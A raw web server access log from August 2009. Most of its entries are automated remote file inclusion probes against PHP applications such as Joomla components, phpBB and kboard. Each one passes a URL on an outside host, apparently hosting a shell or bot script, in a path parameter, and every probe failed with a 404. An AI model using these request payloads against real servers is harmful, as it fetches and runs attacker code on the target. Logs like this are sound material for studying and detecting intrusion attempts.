69.73.159.26 - - [16/Aug/2009:03:04:30 -0500] "GET /logs/access_log.1245801600/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
141.223.5.12 - - [16/Aug/2009:03:04:46 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yasmin.ws//blog/hardcore/fx29id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
141.223.5.12 - - [16/Aug/2009:03:04:46 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://yasmin.ws//blog/hardcore/fx29id.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
141.223.5.12 - - [16/Aug/2009:03:04:46 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://yasmin.ws//blog/hardcore/fx29id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.50.10.35 - - [16/Aug/2009:03:15:33 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.50.10.35 - - [16/Aug/2009:03:15:36 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.50.10.35 - - [16/Aug/2009:03:15:36 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:15:48 -0500] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:15:48 -0500] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:15:48 -0500] "GET /logs/access_log.1242086400/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:03:15:55 -0500] "GET /logs/access_log.1245801600/components/com_joomlaboard/file_upload.php?sbp=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.205.42.76 - - [16/Aug/2009:03:16:21 -0500] "GET /index.php?p=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
67.205.42.76 - - [16/Aug/2009:03:16:21 -0500] "GET /logs/index.php?p=http://abdullah.pp.ru/pbotres.txt%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
66.135.55.136 - - [16/Aug/2009:03:17:30 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:03:17:30 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.135.55.136 - - [16/Aug/2009:03:17:30 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:03:17:55 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:03:17:55 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.64.34.67 - - [16/Aug/2009:03:17:55 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:03:18:48 -0500] "GET /logs/access_log.1236211200//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:03:18:48 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:03:18:49 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:01 -0500] "GET /logs/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:01 -0500] "GET /home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:01 -0500] "GET /logs/access_log.1240876800/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:01 -0500] "GET /logs/access_log.1247616000/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:41 -0500] "GET /home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:41 -0500] "GET /logs/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:41 -0500] "GET /logs/access_log.1247616000/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:20:41 -0500] "GET /logs/access_log.1240876800/home.php?action=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.55.227.145 - - [16/Aug/2009:03:22:09 -0500] "GET /logs/access_log.1247270400%22%20target=%22_blank///skin/ggambo7002_board/write.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.55.227.145 - - [16/Aug/2009:03:22:09 -0500] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.55.227.145 - - [16/Aug/2009:03:22:09 -0500] "GET ///skin/ggambo7002_board/write.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.55.227.145 - - [16/Aug/2009:03:23:34 -0500] "GET /logs/access_log.1247616000%22%20target=%22_blank///skin/ggambo7002_board/write.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.135.55.136 - - [16/Aug/2009:03:24:29 -0500] "GET /logs/access_log.1230768000//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.155 - - [16/Aug/2009:03:24:48 -0500] "GET /logs/access_log.1226880000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.90.142.117 - - [16/Aug/2009:03:26:46 -0500] "GET //mwchat/libs/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
189.90.142.117 - - [16/Aug/2009:03:26:47 -0500] "GET /logs//mwchat/libs/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.64.34.67 - - [16/Aug/2009:03:27:54 -0500] "GET /logs/access_log.1230768000//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.110.50.127 - - [16/Aug/2009:03:28:49 -0500] "GET /logs/access_log.1230768000//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:03:31:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:03:31:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:03:31:58 -0500] "GET /logs/access_log.1242777600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.218.116.131 - - [16/Aug/2009:03:33:03 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.158.127.241 - - [16/Aug/2009:03:35:06 -0500] "GET /logs/access_log.1241049600%20%20//vp/configure.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:35:06 -0500] "GET /logs//vp/configure.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:35:06 -0500] "GET //vp/configure.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
202.170.119.1 - - [16/Aug/2009:03:36:23 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.170.119.1 - - [16/Aug/2009:03:36:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.170.119.1 - - [16/Aug/2009:03:36:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
124.158.127.241 - - [16/Aug/2009:03:38:57 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:38:57 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:38:57 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.170.119.1 - - [16/Aug/2009:03:41:19 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.170.119.1 - - [16/Aug/2009:03:41:35 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
124.158.127.241 - - [16/Aug/2009:03:45:11 -0500] "GET /logs//includes/functions.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:45:11 -0500] "GET /logs/access_log.1241049600%20%20//includes/functions.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:03:45:11 -0500] "GET //includes/functions.php?phpbb_root_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:49:57 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:49:57 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:49:57 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:50:26 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:50:26 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:50:26 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:50:27 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:03:50:58 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:06 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:06 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:06 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:11 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:11 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:51:11 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:51:37 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:51:37 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:51:37 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:52:21 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:52:21 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:52:21 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:55:17 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:55:17 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:55:17 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:03:55:21 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:03:55:21 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:03:55:21 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:53 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:53 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:53 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:55 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:57 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:57 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:58 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:55:58 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:04 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:13 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:13 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:13 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:13 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:21 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:21 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:21 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:21 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:31 -0500] "GET /logs/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:31 -0500] "GET /hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:31 -0500] "GET /logs/access_log.1247616000/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:03:56:31 -0500] "GET /logs/access_log.1245715200/hall.php?file=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:34 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:35 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:35 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:41 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:41 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:03:58:41 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:59:18 -0500] "GET /logs/access_log.1247961600/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:59:18 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:59:18 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
206.225.23.4 - - [16/Aug/2009:03:59:18 -0500] "GET /logs/access_log.1248134400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.192.139.106 - - [16/Aug/2009:03:59:38 -0500] "GET /logs/access_log.1248134400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
